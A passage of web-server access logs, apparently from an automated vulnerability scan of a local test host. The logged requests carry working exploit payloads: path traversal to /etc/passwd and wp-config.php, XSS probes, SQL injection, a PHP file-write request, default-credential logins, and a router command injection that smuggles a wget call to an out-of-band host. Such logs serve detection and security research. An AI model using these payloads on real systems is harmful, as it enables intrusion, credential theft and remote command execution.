HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apimanui/api-manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"log=29KFpS74UsGLFtVnvyaaV83Cthw@example.com&pwd=29KFpS74UsGLFtVnvyaaV83Cthw@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2229KFpSFxWW7zuFeOqTIYGkHbT6H.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpSFxWW7zuFeOqTIYGkHbT6H.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca28q98smpvbk9ig07h0kukg9oa9undxc.oast.online&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 